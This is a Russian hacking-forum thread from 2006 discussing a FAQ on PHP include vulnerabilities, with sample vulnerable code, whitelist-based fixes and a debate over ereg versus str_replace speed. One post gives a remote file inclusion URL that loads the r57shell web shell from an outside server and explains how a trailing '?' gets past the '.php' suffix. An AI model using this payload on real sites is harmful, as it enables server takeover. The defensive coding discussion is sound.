Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Комментарии к FAQ PHP Including |
29.04.2006, 16:11
|
|
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме:
400609
Репутация:
239
|
|
Комментарии к FAQ PHP Including
Почему-то тема (http://forum.antichat.ru/thread18368.html) оказалась закрытой. Предположительно, это вызванно желанием не засорять ее чужими комментами. Потому предлогаю обсудить ее здесь.
Лично мне хотелось бы высказать свое уважение автору, указать ему на одну несущественную ошибку и немного дополнить FAQ.
Ошибка находится здесь:
Код:
<?
if(file_exists($page))
include "/files/$page";
?>
понятно, что если файл $page существует, то это совершенно не говорит о том, что файл /files/$page существует.
Я бы написал так:
Код:
<?
$page = "../../files/$page.php";
if(file_exists($page))
include $page;
?>
По поводу дополнения - тут есть 2 момента.
1) относительно 0-байтов. Очень часто этот символ фильтруется если и не скриптом, то самим апачем.
Потому имеет смысл обращатся к бажному скрипту
Код:
<?
include "$page.php";
?>
таким образом:
http://site.com/include.php?page=http://rst.void.ru/download/r57shell.txt?
В результате скрипт попытается инклудить
http://rst.void.ru/download/r57shell.txt?.php, то есть ".php" превратится в параметр в http-запросе и не станет нам мешать.
2) относительно фильтрации
наиболее выгодно использовать функцию ereg(). например:
Код:
<?php
if(isset($_GET["page"]))
{
$page = $_GET["page"];
if(ereg("^[a-z]{1,10}$", $page))
@include "../../files/$page.php";
else
die("<a href=\"http://www.fbi.gov\">HACK OFF!</a>");
}
?>
То есть, если параметр page соответствует регулярному выражению "строка длинной от 1 до 10 символов, состоящая из строчных букв", то скрипт примет ее, иначе пошлет недохакера на www.fbi.gov. Кроме того, символ "@" перед include заставит апач не выводить сообщение об ошибке в случае, если соответствующий файл не будет найлен.
Ну вот я и высказался, надеюсь мои слова не будут восприняты как упрек, но зато будут восприняты, как желание дополнить материал.
__________________
Никому нельзя верить...
|
|
|
29.04.2006, 16:14
|
|
Seo Pozitive
Регистрация: 13.08.2004
Сообщений: 779
Провел на форуме:
5581277
Репутация:
1635
|
|
Тема закрыта была, для того чтобы не засорять её. уже получил 2 материала по дополнению, всё будет дополнено и исправлено. всем спасибо
|
|
|
|
29.04.2006, 16:15
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818
Репутация:
569
|
|
свои комменты скинул коту в личку. А насчет твоих... Что-то мне слабо верится что обработка строки регулярными выражениями более эффективно, чем просто отброс лишних сиволов обычным str_replace()  |
|
|
|
29.04.2006, 16:17
|
|
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме:
400609
Репутация:
239
|
|
Trinux
Ты о том, сколько ресурсов тратится?
Я х3. Но могу сказать, что обработка php-сценариев в целом вобще ресурсоемкая задача и насколько она сравнима с ereg() я не в состоянии ответить.
__________________
Никому нельзя верить...
|
|
|
|
29.04.2006, 16:20
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
Все равно str_replace работает быстрее рег выражения в php
будь то ereg,preg_match и т.д.
|
|
|
|
29.04.2006, 16:22
|
|
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме:
400609
Репутация:
239
|
|
Тем не менее мое мнение - все равно, даже если на str_replace тратится 0.01 секунды, а на ereg() 0.1, то нам с вами нет до этого никакого дела )
__________________
Никому нельзя верить...
|
|
|
|
29.04.2006, 16:48
|
|
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772
Репутация:
517
|
|
Сообщение от drmist
Тем не менее мое мнение - все равно, даже если на str_replace тратится 0.01 секунды, а на ereg() 0.1, то нам с вами нет до этого никакого дела )
если у тебя сайт с низкой посещаемостью - то пофиг, а если нет - то... траблы с хостером... с мощностью сервера. время в 0.1 секунду - приличное время
|
|
|
|
29.04.2006, 16:52
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818
Репутация:
569
|
|
Тем не менее мое мнение - все равно, даже если на str_replace тратится 0.01 секунды, а на ereg() 0.1, то нам с вами нет до этого никакого дела )
Я говорил впринипе. Если ты такую защиту воткнешь на rbc.ru, на котором 200к хостов в день, то эта, казалось бы, незначительная разница перерастет в значительную.
А обработка php не столь ресурсоемкий процесс, если грамотно повесить php на сервак.
Кстати, знает кто-нить разницу между ereg() и preg_match()? =))
|
|
|
|
04.05.2006, 19:46
|
|
Участник форума
Регистрация: 03.05.2006
Сообщений: 167
Провел на форуме:
125505
Репутация:
116
|
|
Код:
if (!empty($_GET['go']) && preg_match("#^[a-z0-9_]{2,20}$#", $_GET['go']) && file_exists("modules/".$_GET['go']."/index.php")) {
$module = $_GET['go'];
include("modules/".$module."/index.php");
}
|
|
|
|
04.05.2006, 19:47
|
|
Участник форума
Регистрация: 03.05.2006
Сообщений: 167
Провел на форуме:
125505
Репутация:
116
|
|
Юзаем этот код и все ок - include баг уже не прокатит. Кто не согласен - отписываемся, открываем мне глаза  )) |
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
